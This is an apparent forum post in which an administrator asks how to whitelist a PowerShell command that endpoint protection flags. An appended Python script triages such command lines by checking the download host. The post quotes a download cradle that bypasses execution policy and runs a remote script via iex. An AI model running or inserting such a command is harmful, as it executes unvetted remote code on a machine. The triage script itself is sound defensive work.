Exclude/whitelist certain PowerShell commands

thomas.methlie
Level 1

Admins being admins like to use PowerShell to solve certain tasks. To do this they will often run a PowerShell file downloaded from a server, i.e.:

C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('https://example.com/script.ps1'))

This being an obvious red flag triggers AMP, but gives a lot of false positives in this case.

Is there any way to exclude/whitelist something like this? Like the full command with arguments, the server from which it downloads?

Regards,

Thomas
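
The post asks whether such a command could be treated as expected based on the server it downloads from. As an added example (not part of the original post, and not an AMP feature or configuration), this Python script applies that check to recorded process command lines during alert triage; `APPROVED_HOSTS`, `triage` and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts approved for admin scripts (constructed for this example).
APPROVED_HOSTS = {"example.com"}

# URL argument of a WebClient DownloadString/DownloadFile call.
CRADLE_URL = re.compile(r"\.Download(?:String|File)\(\s*['\"]([^'\"]+)['\"]", re.I)


def triage(command_line, approved_hosts=APPROVED_HOSTS):
    """Classify one recorded process command line as (verdict, detail)."""
    if "powershell" not in command_line.lower():
        return ("not_applicable", "not a PowerShell process")
    urls = CRADLE_URL.findall(command_line)
    if not urls:
        # Encoded or otherwise obscured commands are not decoded here.
        return ("not_applicable", "no literal download URL found")
    for url in urls:
        try:
            parts = urlsplit(url)
        except ValueError:
            return ("alert", "unparseable download URL: " + url)
        host = (parts.hostname or "").lower()
        if parts.scheme.lower() != "https":
            return ("alert", "download not over HTTPS: " + url)
        # Exact match on the parsed hostname; a substring check on the
        # raw command line would also accept lookalike names.
        if host not in approved_hosts:
            return ("alert", "unapproved download host: " + host)
    return ("expected", "all downloads come from approved hosts")


# Constructed sample command lines; the first is the one quoted in the post.
SAMPLES = [
    r"C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('https://example.com/script.ps1'))",
    r"powershell.exe -Command iex ((New-Object System.Net.WebClient).DownloadString('http://example.com/script.ps1'))",
    r"powershell.exe -Command iex ((New-Object System.Net.WebClient).DownloadString('https://example.com.scripts.test/script.ps1'))",
    r"notepad.exe C:\notes.txt",
]

if __name__ == "__main__":
    for line in SAMPLES:
        verdict, detail = triage(line)
        print(f"{verdict:15} {detail}")
```

Only the first sample is classified as expected; the plain-HTTP download and the lookalike hostname still raise an alert even though both contain the string `example.com`.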
